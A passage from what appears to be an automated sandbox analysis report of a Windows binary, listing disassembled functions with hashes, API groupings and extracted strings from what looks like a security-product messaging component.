                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: -
                                                                          • API String ID: 0-2547889144
                                                                          • Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                                                          • Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
                                                                          • Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                                                          • Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40
                                                                          Function 000000014000CC00 Relevance: .1, Instructions: 89COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                                                          • Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
                                                                          • Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                                                          • Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704
                                                                          Function 000000014000C2A0 Relevance: .1, Instructions: 89COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                                                          • Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
                                                                          • Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                                                          • Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710
                                                                          Function 00000001400110F0 Relevance: .1, Instructions: 78COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                                                          • Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
                                                                          • Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                                                          • Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700
                                                                          Function 00007FFAADBEFD40 Relevance: .0, Instructions: 32COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318305230.00007FFAADBE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFAADBE0000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318275672.00007FFAADBE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318347820.00007FFAADBF2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318385065.00007FFAADBFD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318420036.00007FFAADBFF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffaadbe0000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                                          • Instruction ID: 19c16f00aca6445d8b938885d010a27fafb2163ffe1cac12f1f052aef775dfc6
                                                                          • Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                                          • Instruction Fuzzy Hash: 71F04F75B1A7958AEBA48F2DE842A397790E748380B94C039D6DDC3E18EA3CD0648F44
                                                                          Function 00000001400038D0 Relevance: 68.5, APIs: 23, Strings: 16, Instructions: 239timeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 349 1400038d0-140003915 SetWaitableTimer 350 140003925-140003947 349->350 351 140003917-140003924 349->351 352 140003949-140003969 #4 350->352 353 140003970-14000397a 350->353 352->353 354 140003992-1400039d3 EnterCriticalSection LeaveCriticalSection WaitForMultipleObjects 353->354 355 14000397c-14000398d #4 353->355 356 140003d32 354->356 357 1400039d9-1400039f1 354->357 355->354 360 140003d35-140003d49 356->360 358 1400039f3-140003a04 #4 357->358 359 140003a09-140003a1a EnterCriticalSection 357->359 358->359 361 140003a67 359->361 362 140003a1c-140003a34 359->362 365 140003a6c-140003a8e LeaveCriticalSection 361->365 363 140003a36 362->363 364 140003a3e-140003a49 362->364 363->364 364->365 366 140003a4b-140003a65 SetEvent ResetEvent 364->366 367 140003ab4-140003abe 365->367 368 140003a90-140003aad #4 365->368 366->365 369 140003ae8-140003af9 367->369 370 140003ac0-140003ae1 #4 367->370 368->367 371 140003afb-140003b26 #4 369->371 372 140003b2d-140003b37 369->372 370->369 371->372 373 140003b61-140003b6b 372->373 374 140003b39-140003b5a #4 372->374 375 140003b6d-140003b98 #4 373->375 376 140003b9f-140003ba9 373->376 374->373 375->376 377 140003bab-140003bd6 #4 376->377 378 140003bdd-140003be7 376->378 377->378 379 140003be9-140003c14 #4 378->379 380 140003c1b-140003c25 378->380 379->380 381 140003c27-140003c48 #4 380->381 382 140003c4f-140003c59 380->382 381->382 383 140003c83-140003c8d 382->383 384 140003c5b-140003c7c #4 382->384 385 140003cb7-140003cc1 383->385 386 140003c8f-140003cb0 #4 383->386 384->383 387 140003cc3-140003ce4 #4 385->387 388 140003ceb-140003cf5 385->388 386->385 387->388 389 140003d11-140003d14 388->389 390 140003cf7-140003d0c #4 388->390 391 140003d17 call 140001750 389->391 390->389 392 140003d1c-140003d1f 391->392 393 140003d21-140003d29 call 140002650 392->393 394 140003d2e-140003d30 392->394 393->394 394->360
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                                                          • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                                                          • API String ID: 1021822269-3147033232
                                                                          • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                                          • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                                                                          • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                                          • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350
                                                                          Function 0000000140001010 Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 89libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                                                          • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                                                          • API String ID: 883923345-381368982
                                                                          • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                                          • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                                                                          • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                                          • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                                                                          Function 0000000140002460 Relevance: 30.1, APIs: 20, Instructions: 110memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                                                          • String ID:
                                                                          • API String ID: 1613947383-0
                                                                          • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                                          • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                                                                          • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                                          • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                                                                          Function 0000000140004500 Relevance: 22.6, APIs: 15, Instructions: 73memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                                          • String ID:
                                                                          • API String ID: 1995290849-0
                                                                          • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                                          • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                                                                          • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                                          • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                                                                          Function 00000001400048A0 Relevance: 22.6, APIs: 15, Instructions: 65memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                                          • String ID:
                                                                          • API String ID: 1995290849-0
                                                                          • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                                          • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                                                                          • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                                          • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                                                                          Function 0000000140002DE0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 166registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                                                          • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                                          • API String ID: 93015348-1041928032
                                                                          • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                                          • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                                                                          • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                                          • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                                                                          Function 0000000140002B40 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 141libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                                                          • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                                                          • API String ID: 3682727354-300733478
                                                                          • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                                          • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                                                                          • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                                          • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                                                                          Function 00000001400033E0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 126memorytimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                                                          • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                                                          • API String ID: 2587151837-1427723692
                                                                          • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                                          • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                                                                          • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                                          • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                                                                          Function 0000000140004D10 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                                                          • String ID: SetDllDirectoryW$kernel32.dll
                                                                          • API String ID: 3184163350-3826188083
                                                                          • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                                          • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
                                                                          • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                                          • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                                                                          Function 0000000140004BA0 Relevance: 18.1, APIs: 9, Strings: 3, Instructions: 80memorystringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcesslstrlen
                                                                          • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                                          • API String ID: 3424473247-996641649
                                                                          • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                                          • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                                                                          • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                                          • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                                                                          Function 000000014000A740 Relevance: 16.9, APIs: 11, Instructions: 354COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: String$ByteCharMultiWide$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1775797328-0
                                                                          • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                                          • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                                                          • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                                          • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                                                          Function 0000000140009C30 Relevance: 16.6, APIs: 11, Instructions: 150COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                                                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                                                          • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                                                          • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                                                          • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                                                          • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                                                          • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                                                          • String ID:
                                                                          • API String ID: 1232609184-0
                                                                          • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                                          • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                                                          • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                                          • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                                                                          Function 0000000140002740 Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 129memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
